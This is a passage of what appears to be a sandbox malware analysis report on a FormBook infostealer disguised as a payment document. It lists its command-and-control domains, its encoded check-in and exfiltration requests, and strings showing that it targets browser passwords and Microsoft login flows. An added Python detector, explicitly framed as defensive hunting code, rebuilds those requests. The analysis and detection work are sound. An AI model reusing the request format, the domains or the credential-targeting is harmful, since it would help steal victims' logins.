  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
  Content-Length: 204
  Content-Type: application/x-www-form-urlencoded
  Connection: close
  Cache-Control: no-cache
  Host: www.thesnusgang.fun
  Origin: http://www.thesnusgang.fun
  Referer: http://www.thesnusgang.fun/z4qr/
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
  Data Raw: 42 54 56 34 52 52 5f 3d 34 62 78 41 73 39 57 49 63 7a 4a 6e 6a 65 78 77 47 70 30 76 65 57 6d 50 32 43 42 37 74 46 57 77 61 69 6a 44 37 33 4b 4c 61 45 48 2f 35 41 57 76 6f 53 79 7a 61 61 38 7a 76 37 57 62 4f 69 48 74 49 70 30 42 74 6b 30 53 39 76 70 4c 70 6f 71 6b 30 74 67 5a 76 53 57 4b 64 5a 76 33 75 51 49 72 36 38 54 32 61 31 61 51 58 64 46 37 46 6c 4c 53 33 45 63 2b 74 6b 78 37 77 4e 67 42 37 6b 4f 49 55 44 77 34 77 4d 67 67 70 2f 48 4e 30 2b 75 31 71 48 31 59 75 44 70 2b 76 38 77 65 77 56 57 42 59 45 62 48 35 54 64 62 66 74 6f 69 48 67 33 34 6f 44 6a 62 2f 64 67 35 63 6a 72 50 66 6a 38 53 5a 41 3d 3d
  Data Ascii: BTV4RR_=4bxAs9WIczJnjexwGp0veWmP2CB7tFWwaijD73KLaEH/5AWvoSyzaa8zv7WbOiHtIp0Btk0S9vpLpoqk0tgZvSWKdZv3uQIr68T2a1aQXdF7FlLS3Ec+tkx7wNgB7kOIUDw4wMggp/HN0+u1qH1YuDp+v8wewVWBYEbH5TdbftoiHg34oDjb/dg5cjrPfj8SZA==
Source: global traffic; HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Server: nginx
  Date: Fri, 13 Dec 2024 12:18:12 GMT
  Content-Type: text/html
  Content-Length: 148
  Connection: close
  ETag: "674427dd-94"
  Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic; HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Fri, 13 Dec 2024 12:18:44 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  CF-Cache-Status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7eAqeDgL%2B9IYgjwd35JsDeYRc520WXQ1tG0wOTC7AGli1LT4S6mCK7I3oeZyj%2FOYoIa8UazPBsoC1bJHcaux1YI4dkx3aeaByHXc2FnM2BZLEekPa%2FXJN8jwM82UgjRvx1pK"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8f15e6013cb98cbf-EWR
  Content-Encoding: gzip
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1989&min_rtt=1989&rtt_var=994&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=710&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
  Data Raw: 37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 46 e6 7a 46 c8 4a f4 61 86 ea 43 1d 04 00 0f b7 8e 79 99 00 00 00 0d 0a 30 0d 0a 0d 0a
  Data Ascii (chunked, gzip-compressed body; not printable): 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzFzFJaCy0
Source: global traffic; HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Fri, 13 Dec 2024 12:18:47 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  CF-Cache-Status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qO%2BuBPeVrnha5YOePar4qkMlRazE%2BXp%2F%2FKUpLFZs6hYDmoEXNviCHd7y%2F7zBRgCf4V4OOhmThyA6tJT96Xy7mqk%2FXE9UpF0MmWEvj7x5H7Efgv0zB3jaVpTR3dOy6QLVxLdu"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8f15e611efe0de99-EWR
  Content-Encoding: gzip
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1541&min_rtt=1541&rtt_var=770&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=1082&delivery_rate=0&cwnd=184&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
  Data Raw: 37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 46 e6 7a 46 c8 4a f4 61 86 ea 43 1d 04 00 0f b7 8e 79 99 00 00 00 0d 0a 30 0d 0a 0d 0a
  Data Ascii (chunked, gzip-compressed body; not printable): 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzFzFJaCy0
Source: global traffic; HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Fri, 13 Dec 2024 12:18:52 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  CF-Cache-Status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I6vOCY2UsXyGnBoOqK6hB8vtFXVPltGmT3FfWL4dzuAzMxbCVO%2FW70q7dF%2FjIm8K4HVio%2B2nZ3dm1UgDmGdmpkcX3T%2BIM%2B1OCOBpAwE5TPZNGD3MqXuDnHdJAih0CTvXGK7x"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8f15e6336e4c43bb-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1703&min_rtt=1703&rtt_var=851&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=440&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
  Data Raw: 39 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 37 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
  Data Ascii (chunked): 99<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.27.2</center></body></html>0
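Every check-in above shares one shape: a short alphanumeric directory as the path, a GET whose query is one long base64-looking parameter followed by a short second one, a POST with a single form field carrying the same parameter name, a Macintosh Firefox 27 User-Agent sent from a Windows host, and Connection: close. The parameter name BTV4RR_ stays constant across all five domains, which is the pivot to hunt on. The following is an added example, not part of the Joe Sandbox report and not a vendor signature: it rebuilds the five GETs and the POST from the values listed above, adds a constructed benign request as a control, scores each request against those traits, and groups requests by first parameter name to surface the per-build key. The regexes and the three-trait threshold are assumptions derived from this one report.

```python
"""FormBook check-in shape, as seen in the GET/POST traffic listed above.

Added example, not part of the Joe Sandbox report. CHECKINS and POST_BODY carry the
host, path, query and body values of the requests shown above; BENIGN is a
constructed control. The regexes and the three-trait threshold are assumptions
drawn from this one report, not a vendor signature.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

FORMBOOK_UA = ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) "
               "Gecko/20100101 Firefox/27.0")            # exact value observed above
ACCEPT = ("text/html,application/xhtml+xml,application/xml;q=0.9,"
          "image/avif,image/webp,image/apng,*/*;q=0.8")
PATH_RE = re.compile(r"^/[a-z0-9]{2,6}/$")               # /jv64/, /z4qr/, /oizn/ ...
BLOB_RE = re.compile(r"^[A-Za-z0-9+/]{60,}={0,2}$")      # long base64-looking value
SHORT_RE = re.compile(r"^[A-Za-z0-9]{2,8}$")             # trailing short value (Tr=F0udvf)

CHECKINS = [  # (host, path, query) from the five GET requests above
    ("www.y6h6kn.top", "/jv64/", "BTV4RR_=0rgj4Y9sgnjazUN/4YnNawpmVeS/0BjNZTVEPCZk5UU8x8xERo30l5aFjW3xVEpqAaMpb+WWzoUct0TX0HY7w9E5vaK255EpQhtC5dNFByAd90Z0uMBeXk0=&Tr=F0udvf"),
    ("www.thesnusgang.fun", "/z4qr/", "BTV4RR_=1ZZgvIaiKHhduep9Gr9CVWvOgHRqyUfEbyT18lbVckKL7Qn23DKNX9UGqbKheWGJWb8pgnQ+8NB/9Zi1y/4jvQKbXYzZtls87cfJZx+dUoFHR2K38281rgo=&Tr=F0udvf"),
    ("www.telepzow.fit", "/oizn/", "BTV4RR_=uQjrwkUUEo9A4dlTBtchalk/X9854Zb0afRbN7eAn79tTht6fIX+AVk9Vz6pdINH1MMl3rmaK9mEFEBfLFOrRCQBiEGwcQ2q95PqYDbv0Ge51W4VvJEvInw=&Tr=F0udvf"),
    ("www.dnft.immo", "/yeky/", "BTV4RR_=7P22LBHaa1jf6nBK2o2gS6XOG6oCOldtUQ790N9gWu5M59Q4JmwGsTkf7hc1wA5HSyz6dzInvvSoc7txVpadAxG5YrQIOX9iVafYKH1JxvTLehj3THGuTlQ=&Tr=F0udvf"),
    ("www.deadshoy.tech", "/0sq9/", "BTV4RR_=wDssjmzaov4c9lpE8JDB5V0DqfSXJcjPXluydM4tZUUyV1Bm9QX9sM5KRNX6VfgW0wIXfg38PryhAP572OSdzFODF7KjQZum5G+6I0N94vKpqL+/svKTI9o=&Tr=F0udvf"),
]
POST_BODY = ("BTV4RR_=4bxAs9WIczJnjexwGp0veWmP2CB7tFWwaijD73KLaEH/5AWvoSyzaa8zv7WbOiHtIp0Btk0S9vpLpoqk0tgZvSWKdZv3uQIr68T2a1aQXdF7FlLS3Ec+tkx7wNgB7kOIUDw4wMggp/HN0+u1qH1YuDp+v8wewVWBYEbH5TdbftoiHg34oDjb/dg5cjrPfj8SZA==")


def build_get(host, path, query, ua=FORMBOOK_UA, connection="close"):
    return (f"GET {path}?{query} HTTP/1.1\r\nAccept: {ACCEPT}\r\nAccept-Language: en-US,en;q=0.9\r\n"
            f"Connection: {connection}\r\nHost: {host}\r\nUser-Agent: {ua}\r\n\r\n")


def build_post(host, path, body):
    return (f"POST {path} HTTP/1.1\r\nAccept: {ACCEPT}\r\nAccept-Encoding: gzip, deflate, br\r\n"
            f"Accept-Language: en-US,en;q=0.9\r\nContent-Length: {len(body)}\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\nConnection: close\r\nCache-Control: no-cache\r\n"
            f"Host: {host}\r\nOrigin: http://{host}\r\nReferer: http://{host}{path}\r\n"
            f"User-Agent: {FORMBOOK_UA}\r\n\r\n{body}")


SAMPLES = [build_get(*c) for c in CHECKINS] + [build_post("www.thesnusgang.fun", "/z4qr/", POST_BODY)]
BENIGN = build_get("www.example.com", "/search/", "q=firewall+rules&page=2",   # constructed control
                   ua="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0 Safari/537.36",
                   connection="keep-alive")


def parse_request(raw):
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body}


def split_params(qs):
    """name=value pairs without URL-decoding, so '+' and '/' inside the blob survive."""
    return [tuple(p.partition("=")[::2]) for p in qs.split("&") if p]


def checkin_indicators(req):
    """Names of the check-in traits a single request exhibits."""
    h, url, hits = req["headers"], urlsplit(req["target"]), []
    if PATH_RE.match(url.path):
        hits.append("short_random_path")
    if h.get("user-agent") == FORMBOOK_UA:
        hits.append("mac_firefox27_ua")          # Mac Firefox 27 UA sent from a Windows host
    if h.get("connection", "").lower() == "close":
        hits.append("connection_close")
    if req["method"] == "GET":
        p = split_params(url.query)
        if len(p) == 2 and BLOB_RE.match(p[0][1]) and SHORT_RE.match(p[1][1]):
            hits.append("get_two_param_blob_query")
    elif req["method"] == "POST":
        p = split_params(req["body"])
        if len(p) == 1 and BLOB_RE.match(p[0][1]) and h.get("content-type") == "application/x-www-form-urlencoded":
            hits.append("post_single_blob_field")
    return hits


def is_formbook_checkin(raw):
    """A structural trait (GET query or POST body shape) plus at least two more traits."""
    hits = checkin_indicators(parse_request(raw))
    return any(x.startswith(("get_", "post_")) for x in hits) and len(hits) >= 3


def campaign_pivot(raws, min_hosts=3):
    """First parameter name -> hosts it was sent to; a name reused against several
    unrelated domains is the per-build key, the value to pivot on when hunting."""
    hosts = defaultdict(set)
    for raw in raws:
        req = parse_request(raw)
        params = split_params(urlsplit(req["target"]).query if req["method"] == "GET" else req["body"])
        if params:
            hosts[params[0][0]].add(req["headers"].get("host", ""))
    return {k: sorted(v) for k, v in hosts.items() if len(v) >= min_hosts}


if __name__ == "__main__":
    for raw in SAMPLES + [BENIGN]:
        req = parse_request(raw)
        print(req["method"], req["headers"]["host"], is_formbook_checkin(raw), checkin_indicators(req))
    print(campaign_pivot(SAMPLES + [BENIGN]))
```

The short path alone is deliberately not enough: the benign control uses /search/, which matches PATH_RE, and still scores a single trait. Requiring the query or body shape plus two header traits keeps ordinary six-letter directories from tripping the check, while the campaign pivot turns the one constant across five otherwise unrelated domains into a hunting key.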
Source: gXhpelxbquSwSp.exe, 0000000E.00000002.12536862831.0000000002FCE000.00000040.80000000.00040000.00000000.sdmp; String found in binary or memory: http://www.deadshoy.tech
Source: gXhpelxbquSwSp.exe, 0000000E.00000002.12536862831.0000000002FCE000.00000040.80000000.00040000.00000000.sdmp; String found in binary or memory: http://www.deadshoy.tech/0sq9/
Source: X0a-0531.15.dr; String found in binary or memory: https://ac.ecosia.org?q=
Source: xwizard.exe, 0000000F.00000003.11844411815.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://autoitscript.comVP/
Source: xwizard.exe, 0000000F.00000003.11844411815.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12535879368.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://autoitscript.comVPv20
Source: xwizard.exe, 0000000F.00000003.11844411815.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://autoitscript.compb_rtb_ev_part/
Source: xwizard.exe, 0000000F.00000003.11844411815.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12535879368.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://autoitscript.compb_rtb_ev_partv20
Source: X0a-0531.15.dr; String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: xwizard.exe, 0000000F.00000002.12540443456.0000000007AF7000.00000004.00000020.00020000.00000000.sdmp, X0a-0531.15.dr; String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: xwizard.exe, 0000000F.00000002.12540443456.0000000007AF7000.00000004.00000020.00020000.00000000.sdmp, X0a-0531.15.dr; String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: xwizard.exe, 0000000F.00000002.12540443456.0000000007AF7000.00000004.00000020.00020000.00000000.sdmp, X0a-0531.15.dr; String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: xwizard.exe, 0000000F.00000002.12540443456.0000000007AF7000.00000004.00000020.00020000.00000000.sdmp, X0a-0531.15.dr; String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: xwizard.exe, 0000000F.00000002.12540443456.0000000007AF7000.00000004.00000020.00020000.00000000.sdmp, X0a-0531.15.dr; String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: xwizard.exe, 0000000F.00000003.11840998779.0000000007AB2000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://fpt.live.com/https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_author
Source: xwizard.exe, 0000000F.00000002.12535879368.0000000000A22000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://fpt.live.com/session_id=f79511e86c1f4ab69498b2fb7f2923a5&CustomerId=33e01921-4d64-4f8c-a055-
Source: X0a-0531.15.dr; String found in binary or memory: https://gemini.google.com/app?q=
Source: xwizard.exe, 0000000F.00000003.11844411815.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://google.comVISITOR_INFO1_LIVE/
Source: xwizard.exe, 0000000F.00000003.11844411815.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12535879368.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://google.comVISITOR_INFO1_LIVEv20
Source: xwizard.exe, 0000000F.00000003.11844411815.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://google.comVISITOR_PRIVACY_METADATA/
Source: xwizard.exe, 0000000F.00000003.11844411815.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12535879368.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://google.comVISITOR_PRIVACY_METADATAv20ue
Source: xwizard.exe, 0000000F.00000003.11841926942.0000000000A64000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000003.11841968377.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000003.11843979281.0000000000A78000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://login.live.com/https://login.live.com/
Source: xwizard.exe, 0000000F.00000003.11841926942.0000000000A64000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000003.11841968377.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000003.11843979281.0000000000A78000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://login.live.com/https://login.live.com//
Source: xwizard.exe, 0000000F.00000002.12535879368.0000000000A22000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: xwizard.exe, 0000000F.00000002.12535879368.0000000000A22000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033i
Source: xwizard.exe, 0000000F.00000002.12535879368.0000000000A22000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: X0a-0531.15.dr; String found in binary or memory: https://www.ecosia.org/newtab/
Source: gXhpelxbquSwSp.exe, 0000000E.00000002.12546623184.0000000006B1C000.00000004.80000000.00040000.00000000.sdmp, gXhpelxbquSwSp.exe, 0000000E.00000002.12546623184.000000000698A000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12537476710.00000000056FA000.00000004.10000000.00040000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12537476710.000000000588C000.00000004.10000000.00040000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12540120301.0000000007830000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com
Source: xwizard.exe, 0000000F.00000002.12540443456.0000000007AF7000.00000004.00000020.00020000.00000000.sdmp, X0a-0531.15.dr; String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

            E-Banking Fraud

            Source: Yara match | File source: 00000004.00000002.11673757784.0000000002670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000F.00000002.12535665138.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000E.00000002.12536862831.0000000002F50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.11674260737.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000E.00000002.12537425982.0000000003AE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000F.00000002.12536524767.00000000044A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000F.00000002.12536605737.00000000044F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.11674681590.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: Payment Copy #190922-001.exe, 00000000.00000000.11282684870.00000000000C4000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_995c5625-1
            Source: Payment Copy #190922-001.exe, 00000000.00000000.11282684870.00000000000C4000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_daa25851-b
            Source: Payment Copy #190922-001.exe | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_57da8167-f
            Source: Payment Copy #190922-001.exe | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_08cfe792-f
            Source: initial sample | Static PE information: Filename: Payment Copy #190922-001.exe
            Source: Payment Copy #190922-001.exe, 00000000.00000003.11310377322.00000000049B6000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Payment Copy #190922-001.exe
            Source: Payment Copy #190922-001.exe, 00000000.00000003.11308022579.00000000047AC000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Payment Copy #190922-001.exe
            Source: Payment Copy #190922-001.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/3@7/4
            Source: C:\Users\user\Desktop\Payment Copy #190922-001.exe | File created: C:\Users\user\AppData\Local\Temp\aut316F.tmp
            Source: Payment Copy #190922-001.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\Payment Copy #190922-001.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: xwizard.exe, 0000000F.00000002.12535879368.0000000000AC3000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12535879368.0000000000AD0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE plus_addresses (profile_id VARCHAR PRIMARY KEY, facet VARCHAR, plus_address VARCHAR);
            Source: xwizard.exe, 0000000F.00000003.11841926942.0000000000A69000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000003.11841968377.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000003.11843979281.0000000000A78000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Payment Copy #190922-001.exe | ReversingLabs: Detection: 36%
            Source: unknown | Process created: C:\Users\user\Desktop\Payment Copy #190922-001.exe "C:\Users\user\Desktop\Payment Copy #190922-001.exe"
            Source: C:\Users\user\Desktop\Payment Copy #190922-001.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Payment Copy #190922-001.exe"
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe | Process created: C:\Windows\SysWOW64\xwizard.exe "C:\Windows\SysWOW64\xwizard.exe"
            Source: C:\Windows\SysWOW64\xwizard.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Payment Copy #190922-001.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Payment Copy #190922-001.exe"
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe | Process created: C:\Windows\SysWOW64\xwizard.exe "C:\Windows\SysWOW64\xwizard.exe"
            Source: C:\Windows\SysWOW64\xwizard.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Payment Copy #190922-001.exe | Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\Payment Copy #190922-001.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\Payment Copy #190922-001.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\Payment Copy #190922-001.exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\Payment Copy #190922-001.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\Payment Copy #190922-001.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\Payment Copy #190922-001.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\Payment Copy #190922-001.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Payment Copy #190922-001.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Payment Copy #190922-001.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Payment Copy #190922-001.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\Payment Copy #190922-001.exe | Section loaded: ntmarta.dll
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe | Section loaded: mswsock.dll
